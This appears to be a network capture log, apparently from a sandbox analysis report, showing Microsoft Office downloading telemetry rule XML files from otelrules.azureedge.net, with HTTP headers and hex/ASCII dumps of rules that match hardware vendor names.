                                                                                                                  2024-11-14 14:00:48 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  58192.168.2.44981313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:48 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:48 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:48 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 486
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                  ETag: "0x8DC582BB344914B"
                                                                                                                  x-ms-request-id: 3105e439-501e-0064-36ea-351f54000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140048Z-1749fc9bdbdgs9sshC1DFWt6ws00000002tg000000003cp7
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:48 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  59192.168.2.44981513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:48 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:48 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:48 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 486
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                  ETag: "0x8DC582B9018290B"
                                                                                                                  x-ms-request-id: a5c30855-701e-0050-65a2-346767000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140048Z-1749fc9bdbd85qw2hC1DFW157000000002qg00000000b3cm
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:48 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  60192.168.2.44981713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:48 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:48 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:48 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 469
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                  ETag: "0x8DC582BBA701121"
                                                                                                                  x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140048Z-16547b76f7fkcrm9hC1DFWxdag0000000kt000000000etxk
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:48 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  61192.168.2.44981813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:48 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:49 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:48 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 407
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                  ETag: "0x8DC582B9698189B"
                                                                                                                  x-ms-request-id: ea01f9e5-001e-002b-3081-3599f2000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140048Z-1749fc9bdbdcm45lhC1DFWeab800000002e000000000be02
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:49 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  62192.168.2.44981913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:49 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:49 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 415
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                  ETag: "0x8DC582BA41997E3"
                                                                                                                  x-ms-request-id: 59f2508d-401e-00a3-296f-358b09000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140049Z-1749fc9bdbdmg6wshC1DFWu2bc00000002u0000000001xwf
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:49 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  63192.168.2.44982013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:49 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:49 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 477
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                  ETag: "0x8DC582BB8CEAC16"
                                                                                                                  x-ms-request-id: c860b0c2-d01e-007a-2fa3-34f38c000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140049Z-r178fb8d765bflfthC1DFWuy9n00000002s000000000690x
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:49 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  64192.168.2.44982113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:49 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:49 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 464
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                  ETag: "0x8DC582B97FB6C3C"
                                                                                                                  x-ms-request-id: c5ad635d-201e-00aa-3868-353928000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140049Z-r178fb8d765w8fzdhC1DFW8ep400000002f000000000f2f0
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:49 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  65192.168.2.44982413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:49 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:49 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 494
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                  ETag: "0x8DC582BB7010D66"
                                                                                                                  x-ms-request-id: 835da04b-801e-002a-253f-3631dc000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140049Z-1749fc9bdbdns7kfhC1DFWb6c400000002ng00000000cqdc
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:49 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  66192.168.2.44982513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:49 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:49 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                  ETag: "0x8DC582B9748630E"
                                                                                                                  x-ms-request-id: e9ec46b7-301e-0099-3c15-366683000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140049Z-1749fc9bdbd4dqj6hC1DFWr4n400000002kg00000000dq8c
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  67192.168.2.44982713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:49 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:50 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                  ETag: "0x8DC582B9DACDF62"
                                                                                                                  x-ms-request-id: 7dbe6cd5-601e-00ab-1ca2-3466f4000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765kzgrxhC1DFWrsuc00000002hg000000005z04
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
